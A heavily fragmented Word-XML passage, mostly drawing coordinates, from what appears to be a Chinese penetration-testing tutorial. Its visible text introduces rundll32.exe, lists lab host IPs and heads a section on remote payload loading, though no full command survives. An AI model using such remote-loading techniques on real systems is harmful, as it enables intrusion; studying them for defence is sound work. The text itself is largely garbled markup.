1,1510,15585,1510,15579,1510,15572,1510,15566,1510,15559,1510,15553,1510,15546,1510,15539,1510,15532,1510,15524,1510,15517,1510,15509,1510,15501,1510,15494,1510,15486,1510,15477,1510,15469,1510,15461,1510,15452,1510,15443,1510,15434,1510,15425,1510,15416,1510,15407e x" fillcolor="#f6f6f6" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:73.874pt;margin-top:768.874pt;width:2.125pt;height:20.125pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1477,15377" coordsize="42,402">
        <v:shape style="position:absolute;left:1477;top:15377;width:42;height:402" coordorigin="1477,15377" coordsize="42,402" path="m1517,15407l1517,15407,1517,15407,1517,15407,1517,15407,1517,15407,1517,15407,1517,15407,1517,15407,1517,15407,1517,15407,1517,15407,1517,15407,1517,15407,1517,15407,1517,15407,1517,15408,1517,15408,1517,15408,1517,15408,1517,15408,1517,15409,1517,15409,1517,15409,1517,15409,1517,15410,1517,15410,1517,15411,1517,15411,1517,15412,1517,15412,1517,15413,1517,15413,1517,15414,1517,15415,1517,15416,1517,15416,1517,15417,1517,15418,1517,15419,1517,15420,1517,15421,1517,15422,1517,15423,1517,15424,1517,15426,1517,15427,1517,15428,1517,15430,1517,15431,1517,15433,1517,15435,1517,15436,1517,15438,1517,15440,1517,15442,1517,15444,1517,15446,1517,15448,1517,15450,1517,15452,1517,15455,1517,15457,1517,15460,1517,15462,1517,15465,1517,15468,1517,15471,1517,15474,1517,15477,1517,15480,1517,15483,1517,15486,1517,15490,1517,15493,1517,15497,1517,15501,1517,15504,1517,15508,1517,15512,1517,15517,1517,15521,1517,15525,1517,15530,1517,15534,1517,15539,1517,15543,1517,15548,1517,15553,1517,15558,1517,15564,1517,15569,1517,15575,1517,15580,1517,15586,1517,15592,1517,15598,1517,15604,1517,15610,1517,15616,1517,15623,1517,15629,1517,15636,1517,15643,1517,15650,1517,15657,1517,15665,1517,15672,1517,15680,1517,15687,1517,15695,1517,15703,1517,15711,1517,15720,1517,15728,1517,15737,1517,15745,1517,15754,1517,15763,1517,15773,1517,15782e" filled="f" stroked="t" strokeweight="0.750pt" strokecolor="#e6e8eb">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:234.874pt;margin-top:770.874pt;width:7.125pt;height:14.125pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="4697,15417" coordsize="142,282">
        <v:shape style="position:absolute;left:4697;top:15417;width:142;height:282" coordorigin="4697,15417" coordsize="142,282" path="m4736,15452l4736,15452,4736,15452,4736,15452,4736,15452,4736,15452,4736,15452,4736,15452,4736,15452,4736,15452,4736,15452,4736,15452,4736,15452,4737,15452,4737,15452,4737,15452,4737,15452,4737,15452,4737,15452,4737,15452,4737,15452,4737,15452,4737,15452,4737,15452,4737,15452,4737,15452,4737,15452,4738,15452,4738,15452,4738,15452,4738,15452,4738,15452,4739,15452,4739,15452,4739,15452,4739,15452,4739,15452,4740,15452,4740,15452,4740,15452,4741,15452,4741,15452,4741,15452,4742,15452,4742,15452,4742,15452,4743,15452,4743,15452,4744,15452,4744,15452,4745,15452,4745,15452,4746,15452,4746,15452,4747,15452,4748,15452,4748,15452,4749,15452,4750,15452,4750,15452,4751,15452,4752,15452,4753,15452,4753,15452,4754,15452,4755,15452,4756,15452,4757,15452,4758,15452,4759,15452,4760,15452,4761,15452,4762,15452,4763,15452,4764,15452,4765,15452,4766,15452,4768,15452,4769,15452,4770,15452,4772,15452,4773,15452,4774,15452,4776,15452,4777,15452,4779,15452,4780,15452,4782,15452,4783,15452,4785,15452,4787,15452,4788,15452,4790,15452,4792,15452,4794,15452,4796,15452,4797,15452,4799,15452,4801,15452,4803,15452,4806,15452,4808,15452,4810,15452,4812,15452,4814,15452,4817,15452,4819,15452,4821,15452,4824,15452,4826,15452,4829,15452,4831,15452,4834,15452,4836,15452,4839,15452,4842,15452,4845,15452,4848,15452,4850,15452,4853,15452,4856,15452,4856,15452,4856,15452,4856,15452,4856,15452,4856,15452,4856,15452,4856,15452,4856,15452,4856,15452,4856,15452,4856,15452,4856,15452,4856,15452,4856,15452,4856,15452,4856,15452,4856,15452,4856,15453,4856,15453,4856,15453,4856,15453,4856,15453,4856,15453,4856,15454,4856,15454,4856,15454,4856,15454,4856,15455,4856,15455,4856,15455,4856,15456,4856,15456,4856,15457,4856,15457,4856,15458,4856,15458,4856,15459,4856,15459,4856,15460,4856,15461,4856,15461,4856,15462,4856,15463,4856,15464,4856,15465,4856,15466,4856,15467,4856,15468,4856,15469,4856,15470,4856,15471,4856,15472,4856,15473,4856,15474,4856,15476,4856,15477,4856,15478,4856,15480,4856,15481,4856,15483,4856,15484,4856,15486,4856,15488,4856,15490,4856,15491,4856,15493,4856,15495,4856,15497,4856,15499,4856,15502,4856,15504,4856,15506,4856,15508,4856,15511,4856,15513,4856,15516,4856,15518,4856,15521,4856,15524,4856,15526,4856,15529,4856,15532,4856,15535,4856,15538,4856,15542,4856,15545,4856,15548,4856,15551,4856,15555,4856,15559,4856,15562,4856,15566,4856,15570,4856,15574,4856,15578,4856,15582,4856,15586,4856,15590,4856,15594,4856,15599,4856,15603,4856,15608,4856,15612,4856,15617,4856,15622,4856,15627,4856,15632,4856,15637,4856,15643,4856,15648,4856,15653,4856,15659,4856,15664,4856,15670,4856,15676,4856,15682,4856,15688,4856,15694,4856,15701,4856,15707,4856,15707,4856,15707,4856,15707,4856,15707,4856,15707,4856,15707,4856,15707,4856,15707,4856,15707,4856,15707,4856,15707,4856,15707,4856,15707,4856,15707,4856,15707,4856,15707,4856,15707,4856,15707,4856,15707,4856,15707,4856,15707,4856,15707,4856,15707,4856,15707,4855,15707,4855,15707,4855,15707,4855,15707,4855,15707,4855,15707,4855,15707,4854,15707,4854,15707,4854,15707,4854,15707,4853,15707,4853,15707,4853,15707,4853,15707,4852,15707,4852,15707,4852,15707,4851,15707,4851,15707,4850,15707,4850,15707,4850,15707,4849,15707,4849,15707,4848,15707,4848,15707,4847,15707,4846,15707,4846,15707,4845,15707,4845,15707,4844,15707,4843,15707,4843,15707,4842,15707,4841,15707,4840,15707,4839,15707,4839,15707,4838,15707,4837,15707,4836,15707,4835,15707,4834,15707,4833,15707,4832,15707,4831,15707,4830,15707,4829,15707,4828,15707,4826,15707,4825,15707,4824,15707,4823,15707,4821,15707,4820,15707,4819,15707,4817,15707,4816,15707,4814,15707,4813,15707,4811,15707,4810,15707,4808,15707,4806,15707,4805,15707,4803,15707,4801,15707,4799,15707,4797,15707,4795,15707,4793,15707,4791,15707,4789,15707,4787,15707,4785,15707,4783,15707,4781,15707,4779,15707,4776,15707,4774,15707,4772,15707,4769,15707,4767,15707,4764,15707,4762,15707,4759,15707,4756,15707,4754,15707,4751,15707,4748,15707,4745,15707,4742,15707,4739,15707,4736,15707,4736,15707,4736,15707,4736,15707,4736,15707,4736,15707,4736,15707,4736,15707,4736,15707,4736,15707,4736,15707,4736,15707,4736,15707,4736,15707,4736,15707,4736,15706,4736,15706,4736,15706,4736,15706,4736,15706,4736,15706,4736,15706,4736,15706,4736,15705,4736,15705,4736,15705,4736,15705,4736,15704,4736,15704,4736,15704,4736,15703,4736,15703,4736,15702,4736,15702,4736,15701,4736,15701,4736,15700,4736,15700,4736,15699,4736,15699,4736,15698,4736,15697,4736,15696,4736,15696,4736,15695,4736,15694,4736,15693,4736,15692,4736,15691,4736,15690,4736,15689,4736,15688,4736,15687,4736,15686,4736,15684,4736,15683,4736,15682,4736,15680,4736,15679,4736,15677,4736,15676,4736,15674,4736,15673,4736,15671,4736,15669,4736,15667,4736,15665,4736,15663,4736,15661,4736,15659,4736,15657,4736,15655,4736,15653,4736,15650,4736,15648,4736,15646,4736,15643,4736,15640,4736,15638,4736,15635,4736,15632,4736,15629,4736,15626,4736,15623,4736,15620,4736,15617,4736,15614,4736,15611,4736,15607,4736,15604,4736,15600,4736,15597,4736,15593,4736,15589,4736,15585,4736,15581,4736,15577,4736,15573,4736,15569,4736,15564,4736,15560,4736,15556,4736,15551,4736,15546,4736,15541,4736,15537,4736,15532,4736,15527,4736,15521,4736,15516,4736,15511,4736,15505,4736,15500,4736,15494,4736,15488,4736,15483,4736,15477,4736,15471,4736,15464,4736,15458,4736,15452e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:270.874pt;margin-top:770.874pt;width:7.125pt;height:14.125pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="5417,15417" coordsize="142,282">
        <v:shape style="position:absolute;left:5417;top:15417;width:142;height:282" coordorigin="5417,15417" coordsize="142,282" path="m5457,15452l5457,15452,5457,15452,5457,15452,5457,15452,5457,15452,5457,15452,5457,15452,5457,15452,5457,15452,5457,15452,5457,15452,5457,15452,5457,15452,5457,15452,5457,15452,5457,15452,5457,15452,5457,15452,5457,15452,5457,15452,5457,15452,5457,15452,5458,15452,5458,15452,5458,15452,5458,15452,5458,15452,5458,15452,5458,15452,5458,15452,5459,15452,5459,15452,5459,15452,5459,15452,5460,15452,5460,15452,5460,15452,5460,15452,5461,15452,5461,15452,5461,15452,5462,15452,5462,15452,5462,15452,5463,15452,5463,15452,5464,15452,5464,15452,5465,15452,5465,15452,5466,15452,5466,15452,5467,15452,5467,15452,5468,15452,5469,15452,5469,15452,5470,15452,5471,15452,5471,15452,5472,15452,5473,15452,5474,15452,5475,15452,5475,15452,5476,15452,5477,15452,5478,15452,5479,15452,5480,15452,5481,15452,5482,15452,5483,15452,5484,15452,5486,15452,5487,15452,5488,15452,5489,15452,5491,15452,5492,15452,5493,15452,5495,15452,5496,15452,5497,15452,5499,15452,5501,15452,5502,15452,5504,15452,5505,15452,5507,15452,5509,15452,5510,15452,5512,15452,5514,15452,5516,15452,5518,15452,5520,15452,5522,15452,5524,15452,5526,15452,5528,15452,5530,15452,5532,15452,5535,15452,5537,15452,5539,15452,5542,15452,5544,15452,5546,15452,5549,15452,5552,15452,5554,15452,5557,15452,5560,15452,5562,15452,5565,15452,5568,15452,5571,15452,5574,15452,5577,15452,5577,15452,5577,15452,5577,15452,5577,15452,5577,15452,5577,15452,5577,15452,5577,15452,5577,15452,5577,15452,5577,15452,5577,15452,5577,15452,5577,15452,5577,15452,5577,15452,5577,15452,5577,15453,5577,15453,5577,15453,5577,15453,5577,15453,5577,15453,5577,15454,5577,15454,5577,15454,5577,15454,5577,15455,5577,15455,5577,15455,5577,15456,5577,15456,5577,15457,5577,15457,5577,15458,5577,15458,5577,15459,5577,15459,5577,15460,5577,15461,5577,15461,5577,15462,5577,15463,5577,15464,5577,15465,5577,15466,5577,15467,5577,15468,5577,15469,5577,15470,5577,15471,5577,15472,5577,15473,5577,15474,5577,15476,5577,15477,5577,15478,5577,15480,5577,15481,5577,15483,5577,15484,5577,15486,5577,15488,5577,15490,5577,15491,5577,15493,5577,15495,5577,15497,5577,15499,5577,15502,5577,15504,5577,15506,5577,15508,5577,15511,5577,15513,5577,15516,5577,15518,5577,15521,5577,15524,5577,15526,5577,15529,5577,15532,5577,15535,5577,15538,5577,15542,5577,15545,5577,15548,5577,15551,5577,15555,5577,15559,5577,15562,5577,15566,5577,15570,5577,15574,5577,15578,5577,15582,5577,15586,5577,15590,5577,15594,5577,15599,5577,15603,5577,15608,5577,15612,5577,15617,5577,15622,5577,15627,5577,15632,5577,15637,5577,15643,5577,15648,5577,15653,5577,15659,5577,15664,5577,15670,5577,15676,5577,15682,5577,15688,5577,15694,5577,15701,5577,15707,5577,15707,5577,15707,5577,15707,5577,15707,5577,15707,5577,15707,5577,15707,5577,15707,5577,15707,5577,15707,5577,15707,5577,15707,5577,15707,5577,15707,5577,15707,5577,15707,5577,15707,5576,15707,5576,15707,5576,15707,5576,15707,5576,15707,5576,15707,5576,15707,5576,15707,5576,15707,5576,15707,5575,15707,5575,15707,5575,15707,5575,15707,5575,15707,5574,15707,5574,15707,5574,15707,5574,15707,5573,15707,5573,15707,5573,15707,5573,15707,5572,15707,5572,15707,5572,15707,5571,15707,5571,15707,5570,15707,5570,15707,5569,15707,5569,15707,5568,15707,5568,15707,5567,15707,5567,15707,5566,15707,5566,15707,5565,15707,5564,15707,5564,15707,5563,15707,5562,15707,5561,15707,5561,15707,5560,15707,5559,15707,5558,15707,5557,15707,5556,15707,5555,15707,5554,15707,5553,15707,5552,15707,5551,15707,5550,15707,5549,15707,5548,15707,5547,15707,5546,15707,5544,15707,5543,15707,5542,15707,5540,15707,5539,15707,5538,15707,5536,15707,5535,15707,5533,15707,5531,15707,5530,15707,5528,15707,5527,15707,5525,15707,5523,15707,5521,15707,5520,15707,5518,15707,5516,15707,5514,15707,5512,15707,5510,15707,5508,15707,5506,15707,5503,15707,5501,15707,5499,15707,5497,15707,5494,15707,5492,15707,5490,15707,5487,15707,5485,15707,5482,15707,5479,15707,5477,15707,5474,15707,5471,15707,5468,15707,5466,15707,5463,15707,5460,15707,5457,15707,5457,15707,5457,15707,5457,15707,5457,15707,5457,15707,5457,15707,5457,15707,5457,15707,5457,15707,5457,15707,5457,15707,5457,15707,5457,15707,5457,15707,5457,15706,5457,15706,5457,15706,5457,15706,5457,15706,5457,15706,5457,15706,5457,15706,5457,15705,5457,15705,5457,15705,5457,15705,5457,15704,5457,15704,5457,15704,5457,15703,5457,15703,5457,15702,5457,15702,5457,15701,5457,15701,5457,15700,5457,15700,5457,15699,5457,15699,5457,15698,5457,15697,5457,15696,5457,15696,5457,15695,5457,15694,5457,15693,5457,15692,5457,15691,5457,15690,5457,15689,5457,15688,5457,15687,5457,15686,5457,15684,5457,15683,5457,15682,5457,15680,5457,15679,5457,15677,5457,15676,5457,15674,5457,15673,5457,15671,5457,15669,5457,15667,5457,15665,5457,15663,5457,15661,5457,15659,5457,15657,5457,15655,5457,15653,5457,15650,5457,15648,5457,15646,5457,15643,5457,15640,5457,15638,5457,15635,5457,15632,5457,15629,5457,15626,5457,15623,5457,15620,5457,15617,5457,15614,5457,15611,5457,15607,5457,15604,5457,15600,5457,15597,5457,15593,5457,15589,5457,15585,5457,15581,5457,15577,5457,15573,5457,15569,5457,15564,5457,15560,5457,15556,5457,15551,5457,15546,5457,15541,5457,15537,5457,15532,5457,15527,5457,15521,5457,15516,5457,15511,5457,15505,5457,15500,5457,15494,5457,15488,5457,15483,5457,15477,5457,15471,5457,15464,5457,15458,5457,1545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646" w:lineRule="auto"/>
        <w:ind w:left="1120" w:right="4795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等。</w:t>
      </w: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Rundll</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="de3f29"/>
          <w:spacing w:val="10"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>32简介：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:spacing w:before="1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Rundll32.exe是指“执行32位的DLL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文件”。它的作用是执行DLL文件中的内部函数,功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能就</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>是以命令行的方式调用动态链接程序库。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18" w:firstLine="0"/>
      </w:pP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说明：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Rundll32.exe所在路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径已被系统添加PATH环境变量中，因此，Wmic命令可识别，需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注意x8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6，x64位的Rundll32调用。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76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:\Windows\System32\rundll32.exe</w:t>
      </w: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:\Windows\SysWOW64\rundll32.exe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76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:\Windows\System32\rundll32.exe</w:t>
      </w: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:\Windows\SysWOW64\rundll32.exe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2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192.168.1.4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10"/>
        </w:rPr>
        <w:t> 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192.168.1.119</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:spacing w:val="10"/>
        </w:rPr>
        <w:t> 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2003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037"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0" w:line="245" w:lineRule="auto"/>
        <w:ind w:left="2161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192.168.1.5</w:t>
      </w:r>
      <w:r>
        <w:tab/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4"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>基</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="de3f29"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>于远程加载（1）：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9"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>注：x86</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:spacing w:val="-46"/>
        </w:rPr>
        <w:t> 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payload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491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521.237pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="10402,0" coordsize="0,10424">
        <v:shape style="position:absolute;left:10402;top:0;width:0;height:10424" coordorigin="10402,0" coordsize="0,10424" path="m10402,0l10402,0,10402,0,10402,0,10402,0,10402,0,10402,0,10402,1,10402,2,10402,3,10402,4,10402,6,10402,8,10402,10,10402,13,10402,16,10402,20,10402,25,10402,30,10402,36,10402,42,10402,49,10402,57,10402,65,10402,75,10402,85,10402,96,10402,108,10402,121,10402,135,10402,150,10402,167,10402,184,10402,202,10402,222,10402,243,10402,265,10402,288,10402,313,10402,339,10402,366,10402,395,10402,426,10402,458,10402,491,10402,526,10402,563,10402,602,10402,642,10402,684,10402,727,10402,773,10402,820,10402,869,10402,920,10402,974,10402,1029,10402,1086,10402,1145,10402,1207,10402,1270,10402,1336,10402,1404,10402,1474,10402,1546,10402,1621,10402,1698,10402,1778,10402,1860,10402,1945,10402,2032,10402,2121,10402,2214,10402,2308,10402,2406,10402,2506,10402,2609,10402,2715,10402,2824,10402,2935,10402,3050,10402,3167,10402,3287,10402,3410,10402,3537,10402,3666,10402,3799,10402,3934,10402,4073,10402,4215,10402,4361,10402,4509,10402,4661,10402,4817,10402,4975,10402,5138,10402,5303,10402,5473,10402,5645,10402,5822,10402,6002,10402,6186,10402,6373,10402,6564,10402,6759,10402,6958,10402,7161,10402,7367,10402,7578,10402,7792,10402,8011,10402,8233,10402,8460,10402,8691,10402,8926,10402,9165,10402,9408,10402,9656,10402,9907,10402,10164,10402,10424e" filled="f" stroked="t" strokeweight="0.750pt" strokecolor="#e6e8eb">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:48.500pt;width:449.500pt;height:18.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,970" coordsize="8990,370">
        <v:shape style="position:absolute;left:1490;top:970;width:8990;height:370" coordorigin="1490,97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1,10484,1002,10484,1002,10484,1002,10484,1003,10484,1003,10484,1004,10484,1004,10484,1004,10484,1005,10484,1006,10484,1006,10484,1007,10484,1008,10484,1008,10484,1009,10484,1010,10484,1011,10484,1012,10484,1013,10484,1014,10484,1015,10484,1016,10484,1017,10484,1018,10484,1019,10484,1021,10484,1022,10484,1024,10484,1025,10484,1027,10484,1028,10484,1030,10484,1032,10484,1034,10484,1035,10484,1037,10484,1039,10484,1042,10484,1044,10484,1046,10484,1048,10484,1051,10484,1053,10484,1056,10484,1058,10484,1061,10484,1064,10484,1067,10484,1070,10484,1073,10484,1076,10484,1079,10484,1083,10484,1086,10484,1089,10484,1093,10484,1097,10484,1100,10484,1104,10484,1108,10484,1112,10484,1117,10484,1121,10484,1125,10484,1130,10484,1134,10484,1139,10484,1144,10484,1149,10484,1154,10484,1159,10484,1164,10484,1170,10484,1175,10484,1181,10484,1186,10484,1192,10484,1198,10484,1204,10484,1211,10484,1217,10484,1223,10484,1230,10484,1237,10484,1243,10484,1250,10484,1258,10484,1265,10484,1272,10484,1280,10484,1287,10484,1295,10484,1303,10484,1311,10484,1319,10484,1328,10484,1336,10484,1345,10484,1345,10484,1345,10484,1345,10484,1345,10484,1345,10484,1345,10483,1345,10482,1345,10482,1345,10480,1345,10479,1345,10477,1345,10475,1345,10473,1345,10470,1345,10466,1345,10462,1345,10458,1345,10453,1345,10448,1345,10442,1345,10435,1345,10428,1345,10419,1345,10411,1345,10401,1345,10391,1345,10379,1345,10367,1345,10354,1345,10340,1345,10326,1345,10310,1345,10293,1345,10275,1345,10256,1345,10236,1345,10215,1345,10192,1345,10168,1345,10143,1345,10117,1345,10090,1345,10061,1345,10031,1345,9999,1345,9966,1345,9931,1345,9895,1345,9858,1345,9819,1345,9778,1345,9735,1345,9691,1345,9646,1345,9598,1345,9549,1345,9498,1345,9445,1345,9391,1345,9334,1345,9275,1345,9215,1345,9153,1345,9088,1345,9022,1345,8953,1345,8883,1345,8810,1345,8735,1345,8658,1345,8578,1345,8497,1345,8413,1345,8326,1345,8238,1345,8146,1345,8053,1345,7957,1345,7859,1345,7758,1345,7654,1345,7548,1345,7439,1345,7328,1345,7214,1345,7097,1345,6977,1345,6855,1345,6730,1345,6602,1345,6471,1345,6337,1345,6201,1345,6061,1345,5918,1345,5773,1345,5624,1345,5472,1345,5317,1345,5159,1345,4997,1345,4833,1345,4665,1345,4494,1345,4319,1345,4141,1345,3960,1345,3776,1345,3587,1345,3396,1345,3201,1345,3002,1345,2800,1345,2594,1345,2385,1345,2172,1345,1955,1345,1734,1345,1510,1345,1510,1345,1510,1345,1510,1345,1510,1345,1510,1345,1510,1345,1510,1345,1510,1345,1510,1345,1510,1345,1510,1344,1510,1344,1510,1344,1510,1344,1510,1344,1510,1344,1510,1344,1510,1344,1510,1343,1510,1343,1510,1343,1510,1343,1510,1342,1510,1342,1510,1342,1510,1341,1510,1341,1510,1341,1510,1340,1510,1340,1510,1339,1510,1339,1510,1338,1510,1337,1510,1337,1510,1336,1510,1335,1510,1334,1510,1333,1510,1333,1510,1332,1510,1331,1510,1329,1510,1328,1510,1327,1510,1326,1510,1325,1510,1323,1510,1322,1510,1321,1510,1319,1510,1318,1510,1316,1510,1314,1510,1312,1510,1311,1510,1309,1510,1307,1510,1305,1510,1303,1510,1300,1510,1298,1510,1296,1510,1293,1510,1291,1510,1288,1510,1286,1510,1283,1510,1280,1510,1277,1510,1274,1510,1271,1510,1268,1510,1265,1510,1262,1510,1258,1510,1255,1510,1251,1510,1247,1510,1244,1510,1240,1510,1236,1510,1232,1510,1228,1510,1223,1510,1219,1510,1214,1510,1210,1510,1205,1510,1200,1510,1195,1510,1190,1510,1185,1510,1180,1510,1175,1510,1169,1510,1163,1510,1158,1510,1152,1510,1146,1510,1140,1510,1134,1510,1127,1510,1121,1510,1114,1510,1108,1510,1101,1510,1094,1510,1087,1510,1079,1510,1072,1510,1065,1510,1057,1510,1049,1510,1041,1510,1033,1510,1025,1510,1017,1510,1008,1510,1000e x" fillcolor="#f6f6f6" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:49.500pt;width:1.500pt;height:17.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,990" coordsize="30,350">
        <v:shape style="position:absolute;left:1490;top:990;width:30;height:350" coordorigin="1490,990" coordsize="30,350" path="m1517,1000l1517,1000,1517,1000,1517,1000,1517,1000,1517,1000,1517,1000,1517,1000,1517,1000,1517,1000,1517,1000,1517,1000,1517,1000,1517,1000,1517,1000,1517,1000,1517,1000,1517,1000,1517,1001,1517,1001,1517,1001,1517,1001,1517,1001,1517,1002,1517,1002,1517,1002,1517,1003,1517,1003,1517,1004,1517,1004,1517,1004,1517,1005,1517,1006,1517,1006,1517,1007,1517,1008,1517,1008,1517,1009,1517,1010,1517,1011,1517,1012,1517,1013,1517,1014,1517,1015,1517,1016,1517,1017,1517,1018,1517,1019,1517,1021,1517,1022,1517,1024,1517,1025,1517,1027,1517,1028,1517,1030,1517,1032,1517,1034,1517,1035,1517,1037,1517,1039,1517,1042,1517,1044,1517,1046,1517,1048,1517,1051,1517,1053,1517,1056,1517,1058,1517,1061,1517,1064,1517,1067,1517,1070,1517,1073,1517,1076,1517,1079,1517,1083,1517,1086,1517,1089,1517,1093,1517,1097,1517,1100,1517,1104,1517,1108,1517,1112,1517,1117,1517,1121,1517,1125,1517,1130,1517,1134,1517,1139,1517,1144,1517,1149,1517,1154,1517,1159,1517,1164,1517,1170,1517,1175,1517,1181,1517,1186,1517,1192,1517,1198,1517,1204,1517,1211,1517,1217,1517,1223,1517,1230,1517,1237,1517,1243,1517,1250,1517,1258,1517,1265,1517,1272,1517,1280,1517,1287,1517,1295,1517,1303,1517,1311,1517,1319,1517,1328,1517,1336,1517,1345e" filled="f" stroked="t" strokeweight="0.750pt" strokecolor="#e6e8eb">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:66.500pt;width:449.500pt;height:18.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,1330" coordsize="8990,370">
        <v:shape style="position:absolute;left:1490;top:1330;width:8990;height:370" coordorigin="1490,1330" coordsize="8990,370" path="m1510,1345l1510,1345,1510,1345,1510,1345,1510,1345,1510,1345,1510,1345,1511,1345,1512,1345,1512,1345,1514,1345,1515,1345,1517,1345,1519,1345,1521,1345,1524,1345,1528,1345,1532,1345,1536,1345,1541,1345,1546,1345,1552,1345,1559,1345,1566,1345,1575,1345,1583,1345,1593,1345,1603,1345,1615,1345,1627,1345,1640,1345,1654,1345,1668,1345,1684,1345,1701,1345,1719,1345,1738,1345,1758,1345,1780,1345,1802,1345,1826,1345,1851,1345,1877,1345,1904,1345,1933,1345,1963,1345,1995,1345,2028,1345,2063,1345,2099,1345,2136,1345,2175,1345,2216,1345,2259,1345,2303,1345,2348,1345,2396,1345,2445,1345,2496,1345,2549,1345,2604,1345,2660,1345,2719,1345,2779,1345,2841,1345,2906,1345,2972,1345,3041,1345,3112,1345,3184,1345,3259,1345,3336,1345,3416,1345,3498,1345,3582,1345,3668,1345,3757,1345,3848,1345,3941,1345,4037,1345,4136,1345,4236,1345,4340,1345,4446,1345,4555,1345,4666,1345,4780,1345,4897,1345,5017,1345,5139,1345,5264,1345,5392,1345,5523,1345,5657,1345,5793,1345,5933,1345,6076,1345,6222,1345,6370,1345,6522,1345,6677,1345,6835,1345,6997,1345,7161,1345,7329,1345,7500,1345,7675,1345,7853,1345,8034,1345,8219,1345,8407,1345,8598,1345,8793,1345,8992,1345,9194,1345,9400,1345,9609,1345,9823,1345,10039,1345,10260,1345,10484,1345,10484,1345,10484,1345,10484,1345,10484,1345,10484,1345,10484,1345,10484,1345,10484,1345,10484,1345,10484,1345,10484,1345,10484,1345,10484,1345,10484,1345,10484,1345,10484,1345,10484,1346,10484,1346,10484,1346,10484,1346,10484,1346,10484,1347,10484,1347,10484,1347,10484,1348,10484,1348,10484,1348,10484,1349,10484,1349,10484,1350,10484,1350,10484,1351,10484,1352,10484,1352,10484,1353,10484,1354,10484,1355,10484,1356,10484,1356,10484,1357,10484,1358,10484,1359,10484,1361,10484,1362,10484,1363,10484,1364,10484,1365,10484,1367,10484,1368,10484,1370,10484,1371,10484,1373,10484,1375,10484,1376,10484,1378,10484,1380,10484,1382,10484,1384,10484,1386,10484,1389,10484,1391,10484,1393,10484,1396,10484,1398,10484,1401,10484,1403,10484,1406,10484,1409,10484,1412,10484,1415,10484,1418,10484,1421,10484,1424,10484,1428,10484,1431,10484,1435,10484,1439,10484,1442,10484,1446,10484,1450,10484,1454,10484,1458,10484,1463,10484,1467,10484,1471,10484,1476,10484,1481,10484,1485,10484,1490,10484,1495,10484,1500,10484,1506,10484,1511,10484,1517,10484,1522,10484,1528,10484,1534,10484,1540,10484,1546,10484,1552,10484,1558,10484,1565,10484,1571,10484,1578,10484,1585,10484,1592,10484,1599,10484,1607,10484,1614,10484,1621,10484,1629,10484,1637,10484,1645,10484,1653,10484,1661,10484,1670,10484,1678,10484,1687,10484,1696,10484,1705,10484,1705,10484,1705,10484,1705,10484,1705,10484,1705,10484,1705,10483,1705,10482,1705,10482,1705,10480,1705,10479,1705,10477,1705,10475,1705,10473,1705,10470,1705,10466,1705,10462,1705,10458,1705,10453,1705,10448,1705,10442,1705,10435,1705,10428,1705,10419,1705,10411,1705,10401,1705,10391,1705,10379,1705,10367,1705,10354,1705,10340,1705,10326,1705,10310,1705,10293,1705,10275,1705,10256,1705,10236,1705,10215,1705,10192,1705,10168,1705,10143,1705,10117,1705,10090,1705,10061,1705,10031,1705,9999,1705,9966,1705,9931,1705,9895,1705,9858,1705,9819,1705,9778,1705,9735,1705,9691,1705,9646,1705,9598,1705,9549,1705,9498,1705,9445,1705,9391,1705,9334,1705,9275,1705,9215,1705,9153,1705,9088,1705,9022,1705,8953,1705,8883,1705,8810,1705,8735,1705,8658,1705,8578,1705,8497,1705,8413,1705,8326,1705,8238,1705,8146,1705,8053,1705,7957,1705,7859,1705,7758,1705,7654,1705,7548,1705,74